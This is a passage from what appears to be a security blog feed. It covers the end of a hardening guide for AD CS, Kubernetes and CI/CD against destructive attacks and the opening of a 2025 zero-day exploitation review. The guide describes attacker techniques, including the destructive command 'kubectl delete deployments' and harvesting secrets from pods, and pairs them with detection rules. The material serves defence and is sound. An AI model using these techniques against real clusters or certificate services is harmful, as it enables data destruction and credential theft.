(None)</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Client Authentication (1.3.6.1.5.5.7.3.2)</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">PKINIT Client Authentication (1.3.6.1.5.2.3.4)</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Smart Card Logon (1.3.6.1.4.1.311.20.2.2)</span></p> </li> </ul> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">For templates with sensitive Enhanced Key Usage (EKU), limit enrollment permissions to predefined users or groups, as certificates with EKUs can be used for multiple purposes. Access control lists for templates should be audited to ensure that they align with the principle of least privilege.</span><span style="vertical-align: baseline;">Templates that allow for domain authentication should be carefully reviewed to verify that built-in groups that contain a large scope of accounts are not assigned enrollment permissions. Example: built-in groups that could increase the risk for abuse include:</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Everyone</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">NT AUTHORITY\Authenticated Users</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Domain Users</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Domain Computers</span></p> </li> </ul> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Where possible, enforce "CA Certificate Manager approval" for any templates that include a SAN as an issuance requirement. This will require that any certificate issuance requests be manually reviewed and approved by an identity assigned the "Issue and Manage Certificates" permission on a certificate authority server.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ensure that Certificate Authorities have not been configured to accept any SAN (irrelevant of the template configuration). This is a non-default configuration and should be avoided wherever possible. This abuse vector is mitigated by KB5014754, but until enforcement of strong mappings is enforced, abuse could still occur based upon historical certificates missing the new OID containing the requester's SID. For additional information, reference the following </span><a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786426(v=ws.11)#controlling-user-added-subject-alternative-names" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Microsoft article</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Treat both root and subordinate certificate authorities as Tier 0 assets and enforce logon restrictions or authentication policy silos to limit the scope of accounts that have elevated access to the servers where certificate services are installed and configured.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Audit and review the NTAuthCertificates container in AD to validate the referenced CA certificates, as this container references CA certificates that enable authentication within AD. Before authenticating a principal, AD checks the NTAuthCertificates container for the CA specified in the authenticating certificate's Issuer field to validate the authenticity of the CA. If rogue or unauthorized CA certificates are present, this could be indicative of a security event that requires further triage and investigation.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">To avoid the theft of a CA's private keys (e.g., via the DPAPI backup protocol), protect the private keys by leveraging a Hardware Security Module (HSM) on servers where certificate authority services are installed and configured.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforce multifactor authentication (MFA) for CA and AD management and operations.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Keep the root CA offline and use subordinate CAs to issue certificates.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Regularly validate and identify potential misconfigurations within existing certificate templates using the built-in Windows command </span><code style="vertical-align: baseline;">certutil.exe</code><span style="vertical-align: baseline;">, or with specialized tools such as </span><a href="https://github.com/GhostPack/PSPKIAudit" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">PSPKIAudit</span></a><span style="vertical-align: baseline;">, </span><a href="https://github.com/ly4k/Certipy" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Certipy</span></a><span style="vertical-align: baseline;">, and </span><a href="https://github.com/GhostPack/Certify" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Certify</span></a><span style="vertical-align: baseline;">. Public tools (e.g., PSPKIAudit, Certipy, or Certify) may be flagged by EDR products as they are frequently used by red teams and threat actors.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">To mitigate NTLM Relay attacks in AD CS, enable Extended Protection For Authentication for Certificate Authority Web Enrollment and Certificate Enrollment Web Service. Additionally, require that AD CS accept only HTTPS connections. For additional details, reference the following </span><a href="https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Microsoft Article</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enable audit logging for Certificate Services on CA servers and Kerberos Authentication Service on Domain Controllers by using group policy. Ensure that event IDs 4886 and 4887 from CA servers and 4768 from domain controllers are aggregated in the organization's SIEM solution.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enable the audit filter on each CA server. This is a bitmask value that represents the seven different audit categories that can be enabled; if all values are enabled, the audit filter will have a value of 127.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Log and monitor events from the CA servers and domain controllers to enhance detections related to AD CS activities (steps 16 and 17 are needed to ensure the appropriate logs are generated).</span></p> </li> </ol></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Detection Opportunities for AD CS Abuse</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Certificate Request with Mismatched SAN (ESC1)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1649/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1649 - Steal or Forge Authentication Certificates</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor event IDs 4886 (certificate request received) and 4887 (certificate issued) on CA servers. Alert when the requesting account's identity differs from the Subject Alternative Name (SAN) specified in the certificate.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">NTLM Relay to AD CS Web Enrollment (ESC8)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1557/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1649/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1649 - Steal or Forge Authentication Certificates</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for NTLM authentication to AD CS HTTP enrollment endpoints from domain controllers or privileged servers. Correlate with PetitPotam coercion indicators. This attack chain provides a direct path from any domain user to Domain Admin.</span></p> </td> </tr> </tbody> </table></div></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 30: Detection opportunities for AD CS abuse</span></div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">5. Preventing Destructive Actions in Kubernetes and CI/CD Pipelines</span></h3> <p><span style="vertical-align: baseline;">Organizations should implement a proactive, defense-in-depth technical hardening strategy to systematically address foundational security gaps and mitigate the risk of destructive actions across their Kubernetes environments and Continuous Integration/Continuous Delivery or Deployment (CI/CD) pipelines. Adversaries increasingly target the CI/CD pipeline and the Kubernetes control plane because they serve as centralized hubs with direct access to application deployments and underlying infrastructure.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Source and Build Compromise:</strong><span style="vertical-align: baseline;"> Threat actors target code repositories (e.g., GitHub, GitLab, Azure DevOps) and build environments to steal injected environment variables and secrets. Attackers can then commit malicious workflow files designed to exfiltrate repository data or deploy unauthorized infrastructure.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Container Registry Poisoning: </strong><span style="vertical-align: baseline;">By compromising developer credentials or CI/CD pipeline permissions, attackers overwrite legitimate application images in the container registry. When the Kubernetes cluster pulls the updated image, it unknowingly deploys a poisoned container embedded with backdoors, ransomware, or destructive data-wiping logic.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Cluster-Level Destruction:</strong><span style="vertical-align: baseline;"> Once an attacker gains a foothold inside the Kubernetes cluster, they often abuse over-permissive role-based access control (RBAC) configurations. This provides the capability to execute destructive commands using application programming interfaces (APIs) (e.g., kubectl delete deployments), wipe persistent volumes, or delete critical namespaces, effectively causing a loss of availability and application denial of service.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Secrets Extraction and Lateral Movement: </strong><span style="vertical-align: baseline;">Attackers routinely execute Kubernetes-specific attack tools to harvest secrets from compromised Kubernetes pods. These secrets often contain database passwords and cloud identity and access management (IAM) keys, allowing the attacker to pivot out of the cluster and impact cloud-based resources.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Additional information related to <a href="https://owasp.org/www-project-top-10-ci-cd-security-risks/" rel="noopener" target="_blank">securing CI/CD</a>.</span></p> <h4><span style="vertical-align: baseline;">Hardening and Mitigation Guidance</span></h4> <p><span style="vertical-align: baseline;">To defend against CI/CD compromises and destructive actions within Kubernetes, organizations must enforce strict identity boundaries, cryptographic trust, and a least-privilege architecture.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Isolate the Kubernetes Control Plane:</strong><span style="vertical-align: baseline;"> Disable unrestricted and public internet access to the Kubernetes API server. For managed services like GKE, EKS, and AKS, ensure the control plane is configured as a private endpoint or heavily restricted via authorized network IP allow-listing. Access to the API should only be permitted from trusted, designated internal management subnets or secure corporate VPNs.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Secure Management Interfaces and CI/CD Pipelines:</strong><span style="vertical-align: baseline;"> Enforce mandatory MFA for all access to infrastructure management platforms, including source code repositories such as GitLab/GitHub, and container registries. Utilize hardened container images (e.g., Chainguard containers, Docker Hardened Images) as base images. Implement software supply chain security frameworks (like </span><a href="https://openssf.org/projects/slsa/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">SLSA</span></a><span style="vertical-align: baseline;">) by requiring image signing, provenance generation, and admission controllers (such as Binary Authorization). This ensures that the Kubernetes cluster will definitively reject and block any unverified or poisoned container images from running.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Enforce Strict RBAC and Least Privilege:</strong><span style="vertical-align: baseline;"> To limit the "blast radius" of a compromised pod, restrict the use of the cluster-admin role and strictly prohibit wildcard (*) permissions for standard service accounts. Workloads must run under strict security contexts—blocking containers from executing as root, preventing privilege escalation, and restricting access to the underlying worker node (e.g., disabling hostPID and hostNetwork).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Implement Immutable Cluster Backups: </strong><span style="vertical-align: baseline;">Protect the cluster's state (etcd) and stateful workload data (Persistent Volumes) by utilizing immutable backup repositories. This ensures that even if an attacker gains administrative access to the cluster or CI/CD pipeline and attempts to maliciously delete all resources, the backups cannot be destroyed or altered.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Enable Audit Logging and Threat Detection: </strong><span style="vertical-align: baseline;">Ensure Kubernetes Control Plane audit logs, node-level telemetry, and CI/CD pipeline logs are actively forwarded to a centralized SIEM. Deploy dedicated container threat detection capabilities to immediately alert on malicious exec commands, suspicious Kubernetes enumeration tools, or bulk data deletion attempts within the pods.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Additional information related to <a href="https://owasp.org/www-project-kubernetes-top-ten/" rel="noopener" target="_blank">securing Kubernetes</a>.</span></p> <h4><span style="vertical-align: baseline;">Detection Opportunities for Kubernetes and CI/CD</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Bulk Kubernetes Resource Deletion</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1485/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1485 - Data Destruction</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor Kubernetes API audit logs for bulk delete operations targeting Deployments, StatefulSets, Persistent Volume Claims, Namespaces, or ConfigMaps.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Unsigned or Modified Container Image Deployed to Cluster</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1525/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1525 - Implant Internal Image</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor container registries and Kubernetes admission events for deployment of images that fail signature verification, lack provenance attestation, or originate from untrusted registries.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Anomalous Kubernetes Secret Access</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1552/007/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1552.007 - Unsecured Credentials: Container API</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor Kubernetes audit logs for API calls to </span><span style="font-style: italic; vertical-align: baseline;">/api/v1/secrets</span><span style="vertical-align: baseline;"> or </span><span style="font-style: italic; vertical-align: baseline;">/api/v1/namespaces/*/secrets</span><span style="vertical-align: baseline;"> from service accounts or users that do not normally access secrets. </span></p> <p><span style="vertical-align: baseline;">Alert on bulk secret enumeration and on access to secrets in sensitive namespaces.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Unauthorized Modification to CI/CD Pipeline Configuration</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1195/002/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor source code repositories for modifications to CI/CD pipeline configuration files. </span></p> <p><span style="vertical-align: baseline;">Alert on changes to pipeline definitions made by accounts that are not members of designated pipeline-owner groups, or changes pushed code outside of an approved pull request/merge request workflow.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Privileged Container or Host Namespace Access</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1611/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1611 - Escape to Host</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor Kubernetes audit logs for pod creation or modification events requesting privileged security contexts, host namespace access, or volume mounts to sensitive host paths. These configurations allow container escape and direct access to the underlying worker node. Alert on any workload requesting these capabilities outside or pre-approved system namespaces.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Kubernetes Audit Logging or Security Agent Tampering</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1562/007/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1562.007 - Impair Defenses: Disable or Modify Cloud Firewall</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for modifications to Kubernetes API server audit policy configurations, deletion or redirection of log export sinks, and disablement or removal of container runtime security agents. Alert on changes to cluster-level logging configurations in managed services (GKE Cloud Audit Logs, EKS Control Plane Logging, AKS Diagnostic Settings) including disablement of API server, authenticator, or scheduler log streams.</span></p> </td> </tr> </tbody> </table></div></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 31: Detection opportunities for Kubernetes and CI/CD</span></div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Conclusion</span></h3> <p><span style="vertical-align: baseline;">Destructive attacks, including ransomware, pose a serious threat to organizations. This blog post provides practical </span><span style="vertical-align: baseline;">guidance on protecting against common techniques used by threat actors for initial access, reconnaissance, privilege escalation, and mission objectives. This blog post should not be considered as a comprehensive defensive guide for every tactic, but it can serve as a valuable resource for organizations to prepare for such attacks. It is based on front-line expertise with helping organizations prepare, contain, eradicate, and recover from potentially destructive threat actors and incidents.</span></p></div>Fri, 06 Mar 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks/Mandiant https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review/<div class="block-paragraph_advanced"><p>Written by: Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Sevens, Fred Plan</p> <hr/></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Executive Summary</span></h3> <p><span style="vertical-align: baseline;">Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in-the-wild in 2025. Although that volume of zero-days is lower than the record high observed in 2023 (100), it is higher than 2024’s count (78) and remained within the 60–100 range established over the previous four years, indicating a trend toward stabilization at these levels.</span></p> <p><span style="vertical-align: baseline;">In 2025, we continued to observe the structural shift, first identified in 2024, toward increased enterprise exploitation. Both the raw number (43) and proportion (48%) of vulnerabilities impacting enterprise technologies reached all-time highs, accounting for almost 50% of total zero-days exploited in 2025. We observed a sustained decrease in detected browser-based exploitation, which fell to historical lows, while seeing increased abuse of operating system vulnerabilities.</span></p> <p><span style="vertical-align: baseline;">State-sponsored espionage groups continue to prioritize edge devices and security appliances as prime entry points into victim networks, with just over half of attributed zero-day exploitation by these groups focused on these technologies. Commercial surveillance vendors (CSVs) maintained an interest in mobile and browser exploitation, adapting and expanding their exploit chains to bypass more recently implemented security boundaries and other mobile security improvements. Multiple intrusions linked to BRICKSTORM malware deployment demonstrated a range of objectives, but the targeting of technology companies demonstrated the potential theft of valuable IP to further the development of zero-day exploits.</span></p> <h3><span style="vertical-align: baseline;">Key Takeaways</span></h3> <ol> <li><strong style="vertical-align: baseline;">Complexity drives higher mobile vulnerability counts.</strong><span style="vertical-align: baseline;">Mobile zero-day discovery counts fluctuated over the last three years, dropping from 17 in 2023 to 9 in 2024, before rebounding to 15 in 2025. As vendor mitigations evolve and increasingly prevent more simplistic exploitation, threat actors have been forced to expand or adjust their techniques. In some cases, attackers have increased the number of chained vulnerabilities to reach desired levels of access within highly protected components. Conversely, threat actors have also managed successful exploitation with fewer or singular bugs by targeting lower levels of access within a single capability, such as an application or service.</span></li> <li><strong style="vertical-align: baseline;">Enterprise software and edge devices remain prime targets.</strong><span style="vertical-align: baseline;">Marking a new high, 48% of 2025’s zero-days targeted enterprise-grade technology. Increased exploitation of security and networking devices highlights the critical risk that can be posed by trusted edge infrastructure, while targeting of enterprise software exhibits the value of highly interconnected platforms that provide privileged access across networks and data assets. Networking and security appliances continued to be highly targeted, by a variety of threat actors, to gain initial access.</span></li> <li><strong style="vertical-align: baseline;">Commercial surveillance vendors (CSVs) further reduce barriers to zero-day access. </strong><span style="vertical-align: baseline;">For the first time since we began tracking zero-day exploitation, we attributed more zero-days to CSVs than to traditional state-sponsored cyber espionage groups. This illustrates the expansion of access to zero-day exploitation via these vendors to a wider array of customers than ever before.</span></li> <li><strong style="vertical-align: baseline;">People’s Republic of China (PRC)-nexus cyber espionage groups continue to dominate traditional state-sponsored espionage zero-day exploitation. </strong><span style="vertical-align: baseline;">Consistent with the trend we have observed for nearly a decade, in comparison to other state sponsors, PRC-nexus groups remained the most prolific users of zero-day vulnerabilities in 2025. These groups, such as UNC5221 and UNC3886, continued to focus heavily on security appliances and edge devices to maintain persistent access to strategic targets.</span></li> <li><strong style="vertical-align: baseline;">Zero-day exploitation by financially motivated threat groups ties previous high.</strong><span style="vertical-align: baseline;"> In 2025, we attributed the exploitation of 9 zero-days to confirmed or likely financially motivated threat groups. This nearly matches the total volume of 2023 and represents a higher proportion of all attributed vulnerabilities in 2025. </span></li> </ol> <h3><span style="vertical-align: baseline;">2026 Zero-Day Forecast</span></h3> <h4><span style="vertical-align: baseline;">Targets and Techniques Continue to Expand</span></h4> <p><span style="vertical-align: baseline;">As certain vendors continue to drive improvements that have made vulnerability exploitation more difficult, particularly in the browser and mobile space, adversaries will continue to adapt with more expansive techniques and diverse targets. Enterprise exploitation will continue to be further enabled by the breadth of applications used across infrastructure. Increased numbers of software, devices, and applications expand attack surfaces, with successful exploitation requiring only a single point of failure to achieve a breach.</span></p> <h4><span style="vertical-align: baseline;">AI Changes the Game</span></h4> <p><span style="vertical-align: baseline;">We anticipate that AI will accelerate the ongoing race between attackers and defenders in 2026 creating a more dynamic threat environment. We expect adversaries will utilize AI to automate and scale attacks by accelerating reconnaissance, vulnerability discovery, and exploit development. Reducing the time required for these phases will place further pressure on defenders to better detect and respond to zero-day exploitation. At the same time, AI will empower defenders to harness tools like agentic solutions to enhance security operations. AI agents can proactively discover and help patch previously unknown security flaws, enabling vendors to neutralize vulnerabilities before exploitation. </span></p> <h4><span style="vertical-align: baseline;">Using Access for Research</span></h4> <p><span style="vertical-align: baseline;">A </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span style="text-decoration: underline; vertical-align: baseline;">BRICKSTORM malware campaign in 2025</span></a><span style="vertical-align: baseline;">, attributed to PRC-nexus espionage operators, may indicate a new paradigm for zero-day exploitation where data theft has the potential to enable long-term zero-day development. Instead of just exfiltrating sensitive client data, the threat actors targeted intellectual property from the victim companies, potentially including source code and proprietary development documents. This IP could be used to discover new vulnerabilities in the vendor's software, not only posing a threat to the victims themselves but also to victims’ downstream customers.</span></p> <h3><span style="vertical-align: baseline;">Scope</span></h3> <p><span 